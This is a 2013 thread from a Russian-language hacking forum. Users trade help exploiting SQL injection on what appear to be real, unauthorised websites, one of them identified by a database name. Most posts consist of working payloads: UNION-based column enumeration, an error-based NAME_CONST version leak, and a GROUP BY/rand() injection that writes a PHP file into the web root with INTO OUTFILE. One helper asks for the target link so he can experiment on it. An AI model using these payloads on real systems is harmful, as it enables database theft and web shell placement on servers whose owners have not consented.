ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.07.2013, 02:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
8952
Репутация:
0
|
|
При подстановке разных параметров в значения через POST, увидел такую ошибку
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]INSERT INTO[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]ap_form_0[/COLOR][COLOR="#007700"]` (`[/COLOR][COLOR="#DD0000"]ip_address[/COLOR][COLOR="#007700"]`,`[/COLOR][COLOR="#DD0000"]date_created[/COLOR][COLOR="#007700"]`)[/COLOR][COLOR="#0000BB"]VALUES[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'мой ip'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'2013-07-14 15:59:15'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#0000BB"]Query failed[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Table[/COLOR][COLOR="#DD0000"]'formy.ap_form_0'[/COLOR][COLOR="#0000BB"]doesn[/COLOR][COLOR="#DD0000"]'t exist[/COLOR][/COLOR]
это ошибка возникает если подставить "-" в параметр, если кавычку то все работает без ошибок, как то можно что то с этим сделать, и как я понял он не может найти указанную таблицу, то есть если и можно, то придется подбирать имя таблицы и поля? |
|
|
|
15.07.2013, 02:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от Voinmraka
Voinmraka said:
то придется подбирать имя таблицы и поля?
Если эти значения, включая и ип передаются через POST, можно попробовать вручную вызвать ошибку, в которой будет выведена интересующая информация, конечно если там и ' не фильтруются.
|
|
|
|
15.07.2013, 02:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
8952
Репутация:
0
|
|
какие бы я запросы не вводил в уязвимый параметр все равно все остается также как я написал выше, разве что время меняется...
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]ap_form_-1_review[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#0000BB"]WHERE id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#0000BB"]Query failed[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Table[/COLOR][COLOR="#DD0000"]'zodiacsi_formy.ap_form_-1_review'[/COLOR][COLOR="#0000BB"]doesn[/COLOR][COLOR="#DD0000"]'t exist[/COLOR][/COLOR]
еще нашел вот это... есть параметр id= если туда ввести значение -1 то выйдет вот это |
|
|
|
16.07.2013, 08:52
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Voinmraka
Voinmraka said:
какие бы я запросы не вводил в уязвимый параметр все равно все остается также как я написал выше, разве что время меняется...
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]SELECT[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]FROM[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#DD0000"]ap_form_-1_review[/COLOR][COLOR="#007700"]`[/COLOR][COLOR="#0000BB"]WHERE id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#0000BB"]Query failed[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Table[/COLOR][COLOR="#DD0000"]'zodiacsi_formy.ap_form_-1_review'[/COLOR][COLOR="#0000BB"]doesn[/COLOR][COLOR="#DD0000"]'t exist[/COLOR][/COLOR]
еще нашел вот это... есть параметр id= если туда ввести значение -1 то выйдет вот это Хм, интересный случай... А если ввести так...
Код:
Code:
Сначала поищем количество полей в таблице
ap_form_1_review
id=1` order by 1 --
id=1` order by 100 --
id=1` union select 1,2,3,4,5 --
Ну или попробовать вариант с error-based
Код:
Code:
id=1` union select * from(select * from(select NAME_CONST((select version()), 14)d) as t join (select NAME_CONST((select version()), 14)e) b)a --
А вообще хотелось бы увидеть линк в ПМ, можно поэкспериментировать...
|
|
|
16.07.2013, 09:01
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
Хм, интересный случай... А если ввести так...
Код:
Code:
Сначала поищем количество полей в таблице
ap_form_1_review
id=1` order by 1 --
id=1` order by 100 --
id=1` union select 1,2,3,4,5 --
Так же не будет работать, если правильную таблицу указать, например:
Код:
Code:
id=1_review` SQL -- 1
Voinmraka, у вас же инъекция в имени таблицы...
|
|
|
|
16.07.2013, 11:41
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от XAMEHA
XAMEHA said:
Так же не будет работать, если правильную таблицу указать, например:
Код:
Code:
id=1_review` SQL -- 1
Voinmraka
, у вас же инъекция в имени таблицы... SELECT * FROM `ap_form_-1_review`
Хм, точно, просмотрел что там ещё окончание таблицы дописывается.
Ну значит просто добавлять
id=1_review` order by 1 --
и по аналогии
|
|
|
|
17.07.2013, 08:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
69791
Репутация:
-7
|
|
Подскажите пожалуйста, как в MySQL выполнить запрос into outfile в такой конструкции:
script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+version()))))
Имею мускуль рута и не экранирующиеся кавычки, команда load_file() работает нормально, но как только я пытаюсь сделать следующий запрос:
script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+user+from+table+into+outfile+'C:\tmp\test .php')))) мускуль мне выдаёт ошибку:
Код:
Code:
...блаблабла MySQL server version for the right syntax to use near 'into outfile 'C:\tmp\test.php'))))and'
На сервере винда, и интерпретатор ASP, а база данных мускуль.... есть ли возможность записи в файл в подобном случае? |
|
|
|
17.07.2013, 08:44
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от Грабитель
Грабитель said:
На сервере винда, и интерпретатор ASP, а база данных мускуль.... есть ли возможность записи в файл в подобном случае?
Нет смысла использовать extractvalue при записи(При чтении - да) в файл в error-based инъекциях, дейлайте как это обычно делается...
|
|
|
|
17.07.2013, 08:50
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Грабитель
Грабитель said:
Подскажите пожалуйста, как в MySQL выполнить запрос into outfile в такой конструкции:
script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+version()))))
Имею мускуль рута и не экранирующиеся кавычки, команда load_file() работает нормально, но как только я пытаюсь сделать следующий запрос:
script.php?id=(1)and(extractvalue(0x3b,concat(0x3b ,(select+user+from+table+into+outfile+'C:\tmp\test .php')))) мускуль мне выдаёт ошибку:
Код:
Code:
...блаблабла MySQL server version for the right syntax to use near 'into outfile 'C:\tmp\test.php'))))and'
На сервере винда, и интерпретатор ASP, а база данных мускуль.... есть ли возможность записи в файл в подобном случае? Насколько я помню, при extractvalue не действует способ into outfile.
Попробуй так
Код:
Code:
or (select count(*) from (select 1 union select 2 union select 3)x group by concat((select 1 into outfile '/usr/home/www/test.php' lines terminated by ""),floor(rand(0)*2)))
Судя по всему с пробелами у тебя запара. Но, думаю, в "скобочный" вариант переделать сам сможешь.
|
|
|
|
19.07.2013, 23:52
|
|
Познающий
Регистрация: 06.04.2009
Сообщений: 30
Провел на форуме:
60216
Репутация:
0
|
|
Есть доступ к сайту через Phpmyadmin пользователь sa что там можно сделать? Injection в сам PHPMYADMIN можно затеять?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
